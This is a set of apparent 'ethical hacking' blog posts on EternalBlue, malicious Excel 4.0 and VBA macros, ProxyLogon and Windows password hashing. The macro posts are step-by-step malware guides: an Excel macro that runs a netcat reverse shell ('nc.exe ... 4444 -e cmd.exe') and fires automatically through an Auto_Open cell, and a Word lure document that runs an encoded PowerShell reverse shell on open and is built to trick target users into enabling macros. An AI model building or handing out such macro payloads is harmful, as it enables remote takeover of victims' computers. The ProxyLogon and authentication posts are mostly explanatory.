Posted on

EternalBlue vulnerability: Explained with POC

Hello, aspiring Ethical Hackers. In this article, you will learn about the infamous EternalBlue vulnerability and its exploitation.

Vulnerability & Impact

Exploited by Wannacry ransomware, the EternalBlue vulnerability exists in the Server Message Block (SMB) protocol. Due to improper handling of specially crafted packets by SMB version 1 (SMBV1) of Microsoft windows this vulnerability allows attackers to execute malicious code on the vulnerable systems. This vulnerability affects Microsoft Windows versions Windows Vista, Windows 7, Windows 8.1, Windows 10, Windows Server 2008, Windows Server 2012, Windows XP, Windows 8 and Windows Server 2003. This vulnerability was observed being exploited as recently as 2020.

Proof Of Concept

As the vulnerability is so famous (I mean infamous), Metasploit has already released exploit modules for this particular vulnerability.

We are going to test some of these modules on a Windows 7 target. Let’s first use the scanner module of metasploit to test whether this machine is vulnerable to EternalBlue vulnerability.

Set the RHOSTS option and execute the module.

The scanner module confirms that the target is indeed vulnerable. Now, let’s load the module for exploiting Eternal Blue vulnerability and grab a session.

Set all the required options and use “check” command to see if the target is indeed vulnerable.

After all the required options are set, execute the module.

As you can see, we got a meterpreter session on the target system and that too with SYSTEM privileges.

Posted on

Excel 4.0 Macros: How to create a malicious one

Hello aspiring ethical hackers. In our previous article, you have learnt what a Macro is and how to create a malicious VBA macro. In this article, you will learn about Excel 4.0 Macros and how to create one. Excel 4.0 Macros or XLM were introduced by Microsoft in 1992 when Excel 4.0 was launched as a default macro language and they serve the same functions as VBA macros in Word.  

As Excel 4.0 Macros are used for legitimate purposes, they can’t just be disabled by many. Further increasing the effectiveness of these macros, there is not yet a good detection method to detect malicious XL4 macros. Apart from this, they are very simple create but also very powerful just like Visual Basic Application (VBA) Macros.

 Now let’s see how to create an Excel 4.0 Macro. On a Windows system, we open Excel in Microsoft Office or the Office Suite. We are doing this on Microsoft Office 2007. You should see an Excel Workbook opened as shown below.

Right click on “Sheet 1” and select the “Insert” option as shown below.

In the newly opened window, select MS Excel 4.0 Macro and click on “OK”.

This will change the name of “Sheet 1” to “Macro 1” as shown below.

Save the file with the name you like. We have named it “evil_macro” for easy identification. While saving it, save it as a Macro Enabled Excel Workbook.

Once the file is saved, it’s time to create the macro. In the first column, which is named A1, we insert the command given below.

=EXEC(“cmd.exe”)

You may not realize, but you have already created your first XL4 macro. In the second column, i.e A2, insert another command =HALT(). This is to ensure that the macro you created does not face an error while running. It’s time to test your macro. Right Click on the first column, and click on “Run” as shown below.

Most probably, this will open a new window as shown below. Click on “Run”.

Doing this opens a Windows CMD window as shown below.

Voila, we successfully created a Excel 4.0 Macro and even executed it. If you have noticed it, we opened a Windows CMD by inserting a simple code. Now, let’s make a few changes to the “evil_macro” file. Move the =HALT() command to A3 cell and enter command given below in cell A2. Save the file.

=ALERT(“You have been hacked”)

Right click on Cell A1 and select “Run” again just like you did before.

Now, we can see that apart from Windows CMD window being opened, another window popped up with the message “You have been hacked”. We have just performed two operations with macros in one file. Not just cmd.exe, we can open other programs like Notepad and Calc.exe using the “=exec” function.

Now, let’s try something a bit advanced like spawning a reverse shell now. Download the Netcat Windows executable. Open Notepad and insert the following command into it.

<Path to Netcat Windows executable> <target IP> <target port> -e cmd.exe.

On our system, this command looks like this.                    

C:\Users\nspadm\Desktop\nc.exe 192.168.36.189 4444 -e cmd.exe

The -e option specifies which command to execute after netcat makes a successful connection. Now, save this file as a CMD file.  This can be done by saving the file in double quotes. For example, “shell.cmd” and keeping the file type as all files.

Now, in your evil_macro file, change the =EXEC function to execute the shell.cmd file you just now created as shown below.

Save the file. Before executing the macro, start a Netcat listener on the listener IP address you specified.

Now, when you execute the macro, you should get a successful shell as shown below.

This is all fine but nobody will open an Excel file and execute some suspicious looking code in it. We need the code to run automatically as soon as the user opens the Excel file. To do this, Click on A1 cell of your “evil_macro” file and rename it to “Auto_Open” as shown below.

Save the changes and close the file. Start the netcat listener again. Now, just open the evil_macro file and you should see the successful spawning of reverse shell again. That’s all about Excel 4.0 Macros for now.

Posted on

Malicious Macro’s : What, Why and How

Hello aspiring Ethical Hackers. In this article, you will learn about Malicious Macros also known as Macro Malware or Macro Virus. In computer science, a Macro is a set of commands grouped together as a single command. This is used to run some tasks automatically. In Word, Macros are used to automate frequently used tasks.
           Hackers have been using Macros since a long time as a means to gain initial access to target networks by injecting malicious code into macros. These macros all called malicious macros or macro malware or macro virus. Let’s see how to create a malicious macro.
             For this we will be using a tool that is here. In Kali, clone this tool as shown below.

Navigate into the cloned directory.

Inside that directory, there will be two python scripts: “newpayloadgeneration.py” and ‘payload.py’. Run the script ‘newpayloadgeneration.py’ giving the Attacker IP and port as options. This script generates a Powershell script for reverse shell. Obviously, the IP and port should be of that system on which the listener is running to receive the reverse shell.

Copy the generated encoded string. Open the file ‘payload.py’ and paste the encoded string in the highlighted place.

Once pasted, save the file ‘payload.py’ to preserve the changes. Now, execute the ‘payload.py’ script.

The code for malicious macro is ready. Now let’s create a Macro document. For this tutorial, we are using MS Office 2007 to create it. Open a new Word document, go to View tab and click on Macros (as highlighted below).

Click on “view macros”.

In the new window that opens, click on “create” and give any name you prefer to that macro (We named it test, obviously).

Now, we create the code for macro. It starts with “Sub AutoOpen(). “Sub” stands for Subroutine in macro. It is a small program within the Visual Basic editor. Setting AutoOpen() executes the macro automatically whenever the document is opened. In the subroutine test(), we paste the malicious code we created earlier as shown below.

Then we save this file. This file is sent to the target users. In Real World hacking attacks, since this is the lure document, some bells and whistles are added to convince users to open the document and enable macros. We start the Netcat listener on the attacker machine. When the target user opens this file, we get a security warning saying that macros have been disabled. This is a security feature by Microsoft to protect user from malicious macros. Let’s enable macros for this tutorial. click on options and enable macros as shown below.

As soon as we do this, a Powershell window opens (remember that a we created a Powershell reverse shell)

and we get a incoming reverse shell on our listener as shown below.

This is how malicious macros work to give attackers initial access.

Posted on

ProxyLogon vulnerability : Explained In detail

Hello aspiring ethical hackers. In this article, you will learn about the ProxyLogon vulnerability. ProxyLogon is a vulnerability that impacts the Microsoft Exchange Server.  It is estimated that over 2,50,000 Microsoft Exchange Servers were victims of this vulnerability at the time of its detection.

The Proxy Logon vulnerability is related to the four zero day vulnerabilities that were detected in the Exchange Server in December 2020. On December 10, 2020, Orange Tsai, security researcher working in DEVCORE, discovered that attackers can combine some vulnerabilities in the Exchange Server to achieve remote code execution on the target and upload a webshell to it. The four vulnerabilities are,

CVE-2021-26855: SERVER SIDE REQUEST FORGERY

This is a Server-Side Request Forgery (SSRF) vulnerability in the Exchange Server that allows remote attackers to gain admin access once exploited. This can be exploited by sending a specially crafted web request to a vulnerable Exchange Server. The web request contains an XML SOAP payload directed at the Exchange Web Services (EWS) API endpoint.  This request bypasses authentication using specially crafted cookies. This vulnerability, combined with the knowledge of a victim’s email address, means the attacker can exfiltrate all emails from the target’s Exchange mailbox.

CVE-2021-26857: REMOTE CODE EXECUTION VULNERABILITY

This is a post-authentication insecure deserialization vulnerability in the Unified Messaging service of an Exchange Server that allows commands to be run with SYSTEM privileges. The SYSTEM account is used by the operating system and services that run under Windows. As readers have seen many times in our Magazine, a SYSTEM account in Windows has full permissions by default. A hacker can either steal credentials or use the above mentioned vulnerability to execute arbitrary commands on a vulnerable Exchange Server in the security context of SYSTEM.

CVE-2021-26858 AND CVE-2021-27065

These two vulnerabilities are post-authentication arbitrary file write vulnerabilities that allow attackers to write files to any path on a vulnerable Exchange Server. A malicious hacker can also exploit the previously mentioned SSRF vulnerability to achieve admin access and then exploit this vulnerability to write web shells to virtual directories (VDirs). These virtual directories are published to the internet by the server’s Internet Information Server (IIS).
IIS is Microsoft’s web server and a dependency that is installed with Exchange Server and provides services for Outlook on the web, previously known as Outlook Web Access (OWA), Outlook Anywhere, ActiveSync, Exchange Web Services, Exchange Control Panel (ECP), the Offline Address Book (OAB) and AutoDiscover.
According to Microsoft, these vulnerabilities were first exploited by HAFNIUM, a Chinese government sponsored APT (Advanced Persistent Threat) but operating out of China. This group is known to install the web shell named China Chopper. As of 12th March 2021, at least 9 other hacker groups exploited these vulnerabilities apart from HAFNIUM.  The versions of Exchange Servers vulnerable to these vulnerabilities are,                   

Exchange Server 2019 < 15.02.0792.010                   
Exchange Server 2019 < 15.02.0721.013                   
Exchange Server 2016 < 15.01.2106.013                   
Exchange Server 2013 < 15.00.1497.012

The exploit is named Proxy Logon as it exploits the proxy architecture and login mechanism in the Exchange Server.

How to detect ProxyLogon vulnerability?

Metasploit has some modules related to these vulnerabilities. Let’s have a look at these modules.

The auxiliary/gather/exchange_proxylogon_collector module exploits the CVE-2021-26855 vulnerability and dumps all the contents of the mailboxes.

The exploit/windows/http/exchange_proxylogon_rce module exploits the CVE-2021-26855 vulnerability to bypass authentication and gain admin access and then writes a arbitrary file to the target using CVE-2021-27065 to achieve remote code execution.  All the above mentioned versions are vulnerable by default.

The auxiliary/scanner/http/exchange_proxylogon module checks for the CVE-2021-26855 vulnerability that makes Exchange Servers vulnerable.

Microsoft has released a security update on March 2021 to patch these vulnerabilities in Exchange Server versions mentioned above. Applying these patches will fix these vulnerabilities. As soon as Microsoft released these security updates, hacker groups around the world went on a scanning spree to hunt for unpatched Exchange Servers.

As there was a delay in applying patches, Microsoft also released a one-click mitigation tool that fixed these vulnerabilities in Exchange Servers. Microsoft has also noted that this tool named Microsoft Exchange On-Premises Mitigation Tool (EOMT) is helpful for those organizations that don’t have a dedicated IT security staff. This tool also includes the Microsoft Safety Scanner and an URL Rewrite mitigation for CVE-2021-26855. However, it stressed that this tool was not an alternative for applying the released security patches.

Posted on

How Windows authentication works?

Hello, aspiring ethical hackers. In this article, you will learn how Windows authentication works?  Our readers have seen multiple instances where we have dumped Windows password hashes as part of our hacking tutorials. This should have brought some pertinent questions in the minds of the readers.
As to know how hashdump command of meterpreter, Mimikatz and cachedump module of Metasploit dump credential hashes, where are these hashes stored and why are they in the form of hashes, readers need  to get a deep understanding of how Windows authentication works.

                Windows Logon Process starts as soon as you go to the Login Screen of a Windows system. The Logon Process is different in different network scenarios for Windows. There are two network types into which  a Windows system can be configured. They are,

  1. WorkGroup
  2. Domain

Windows systems in Workgroup network use Local Authentication whereas Windows systems connected in Domain network use Remote Authentication.

How Local Authentication works in Windows?

Let’s first see how Local Authentication takes place. In local authentication, the password hash is stored on the same computer on which users are trying to log on.
 In Windows, the passwords are stored in the form of a hash in a file known as Security Accounts Manager (SAM) file. The SAM file is located in  %SystemRoot%/system32/config/SAM location and it can neither be deleted nor copied while Windows is running.
This is because the Windows kernel obtains and keeps an exclusive filesystem lock on the SAM file which it will release only after the operating system has shut down or a “Blue Screen of Death” exception has been thrown. It is mounted on HKLM/SAM and SYSTEM privileges are required to view it. Readers have already learnt that passwords are stored in SAM file in encrypted form. These passwords are stored in two hash formats in SAM file.

1. Lan Manager Hash (LM Hash)                                       

2. New Technology Lan Manager Hash (NTLM Hash)

LAN Manager Hash

Lan Manager Hashing was used by Windows operating systems prior to Windows NT 3.1. In LM hashing, the password hash is computed as follows,

a. The user’s password is restricted to a maximum of fourteen characters.  
b. The password of the user is converted to Uppercase.
c. Then user’s password is encoded in the System OEM code page.  
d. This password is NULL-padded to 14 bytes.  
e. This 14 bytes “fixed-length” password is then split into two 7-byte halves.  
f. Both of these 7-byte halves are used to create two DES keys, one from each 7-byte half. This is done by converting the seven bytes into a bit stream with the most significant bit first and then inserting a parity bit after every seven bits (so 1010100 becomes 10101000). This is done to generate the 64 bits needed for a DES key.  
g. Each of this two keys is used to DES-encrypt the constant ASCII string “[email protected]#$%” resulting in two 8-byte ciphertext values.  
h. These two ciphertext values are then concatenated to form a 16-byte value, which is the final LM hash.

Security of LAN Manager Hash

LM Hash has several weaknesses. The major weaknesses are :

1. The maximum length of Password while using LM authentication can only be 14 characters.
2. All passwords in LM hash are converted into UPPERCASE before generating the hash value. This means LM hash treats ABcd1234, ABCD1234 and abCD1234 and AbCd1234 as same as ABCD1234. This reduces the LM hash key space to just 69 characters.
3. As already explained above, 14 character password is broken into two halves of 7 characters e- ach and then the LM hash is calculated for each half separately. This makes it easier to crack a LM hash, as the attacker only needs to brute-force 7 characters twice instead of the full 14 charact- ers.
4. As of 2020, a computer equipped with a high-end graphics processor (GPUs) can compute 40 billion LM-hashes per second. At that rate, all 7-character passwords from the 95-character set can be tested and broken in half an hour; all 7-character alphanumeric passwords can be tested and broken in 2 seconds.
5. If the password created is 7 characters or less than that, then the second half of hash will alway- s produce same constant value which is (0xAAD3B435B51404EE). Therefore, if a password is les- s than or equal to 7 characters long, it can easily be identified even without using any tools.
6. While using Remote Login over a network, the LM hash value is sent to servers without any salting, thus making it vulnerable to man-in-the-middle attacks.
7. Without salting, it is also vulnerable to Rainbow Table Attack.
To overcome this weaknesses, Microsoft Starting with Windows Vista and Windows Server 2008, Microsoft disabled the LM hash by default.

NT Hash

Also called NTLM, this is the hash many modern Windows systems store the password hashes. Introduced in 1993. The process of calculating NT Hash is,

1. The password is converted into Unicode characters.
2. Then MD4 encryption is run on these converted characters to get the NT hash which is then stored in SAM database or NTDS file (Domain). NTHash is case sensitive but it still doesn’t provide salting.

The Local Logon Process

1. The Windows authentication process starts from the Windows Login screen. LogonUI.exe han- dles the process by displaying  correct logon input boxes depending on the authenticator put in place. 
2. When users enter the password on the login interface, winlogon.exe collects those credentials and  passes them to the  lsass.exe (Local Security Authority Subsystem Service). Winlogon.exe is the executable file responsible for managing secure user interactions. The Winlogon service initiat -es the logon process for Windows operating systems by passing the credentials collected by user action to Lsass.
 3. LsaLogonUser supports interactive logons, service logons, and network logons. The LsaLogon User API authenticates users by calling an authentication package which is most probably MSV1_ 0 (MSV) authentication package which is included with Windows NT. 
4. The MSV authentication package is divided into two parts. In Local authentication, both parts run on the same computer. The first part of the MSV authentication package calls the second part.
5. The first part of the MSV authentication package converts the clear-text password both to a LAN Manager Hash and to a Windows NT hash. The second part then queries the SAM databas- e for the password hashes and makes sure that they are identical.
6. If the hash is identical, access is granted.

How Windows Domain Authentication takes place?

1. The Windows authentication process starts from the Windows Login screen. LogonUI.exe handles the process by displaying correct logon input boxes depending on the authenticator put in place. 
2. When users enter the password on the login interface, winlogon.exe collects those credentials and  passes them to the  lsass.exe (Local Security Authority Subsystem Service). Winlogon.exe is the executable file responsible for managing secure user interactions. The Winlogon service initiates the logon process for Windows operating systems by passing the credentials collected by user action to Lsass.
3. LsaLogonUser supports interactive logons, service logons, and network logons. The LsaLogon User API authenticates users by calling an authentication package which is most probably MSV1_ 0 (MSV) authentication package which is included with Windows NT. 
4. The MSV authentication package is divided into two parts. The first part of the MSV authentication package runs on the computer that is being connected to and the second part runs on the computer that contains the user account. When the first part of the MSV authentication package recognizes that network authentication is required because the domain name passed is not its own domain name, it passes the request to the Netlogon service. Netlogon service is a Authentication Mechanism used in the Windows Client Authentication Architecture that is used to verify logon requests. It registers, authenticates and locates Domain Controllers. It’s functions include,

     a. Selecting the domain to pass the authentication request to.

     b. Selecting  the server within the domain.

     c. Passing the authentication request through to the selected server.

5. The Netlogon service (client computer) then forwards the login request to the Netlogon service on the destination computer (i.e domain controller). 
6. In turn, the Netlogon service passes the request to the second part of the MSV authentication package on that destination computer.
7. First, the second part queries the password hashes from the SAM database or from the Active Directory database. Then, the second part computes the challenge response by using the password hash from the database and the challenge that was passed in. The second part then compares the computed challenge response to passed-in challenge response.
8. If the hash is identical, access is granted.

That was all about how Windows authentication.